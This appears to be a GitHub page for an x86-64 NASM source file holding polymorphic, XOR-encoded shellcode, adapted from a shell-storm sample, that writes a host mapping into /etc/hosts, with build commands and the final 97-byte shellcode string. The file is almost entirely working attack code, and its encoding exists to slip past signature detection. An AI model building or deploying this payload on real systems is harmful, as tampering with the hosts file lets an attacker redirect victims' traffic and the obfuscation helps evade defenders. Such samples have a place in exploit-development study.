Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
46 lines (38 sloc) 1.41 KB
; Add a host mapping to /etc/hosts
; Polymorphic version of code from http://shell-storm.org/shellcode/files/shellcode-896.php
; Build with: nasm -felf64 addhost.nasm -o tmp.o && ld tmp.o -o addhost
global _start
section .TEXT exec write
_start:
jmp _code_marker ; Get the payload address
_decode:
pop rax
push 76 ; Decode size
pop rcx
_decode_loop:
xor byte [rax], 0x41
inc rax
loop _decode_loop
jmp _payload ; Jump to decoded payload
_code_marker:
call _decode
_payload:
db 0x09,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a
db 0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,0x2e
db 0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44
db 0x09,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,0x41,0x41
db 0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61
db 0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,0x2d,0x2a,0x4b
db 0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e
db 0x44,0x2b,0x7d,0x19,0x4e,0x44
; Final Shellcode - 97 bytes
; "\xeb\x0e\x58\x6a\x4c\x59\x80\x30\x41\x48"
; "\xff\xc0\xe2\xf8\xeb\x05\xe8\xed\xff\xff"
; "\xff\x09\x70\xb7\x27\xc0\x87\x40\x45\xa9"
; "\x4a\x41\x41\x41\x6e\x24\x35\x22\x6e\x29"
; "\x2e\x32\x35\x32\x41\x1e\x2b\x43\x19\x4e"
; "\x44\x09\xd6\x2b\x40\x19\xa9\x55\x41\x41"
; "\x41\x70\x73\x76\x6f\x70\x6f\x70\x6f\x70"
; "\x61\x26\x2e\x2e\x26\x2d\x24\x6f\x2d\x2a"
; "\x4b\x1f\x2b\x55\x1b\x4e\x44\x2b\x42\x19"
; "\x4e\x44\x2b\x7d\x19\x4e\x44";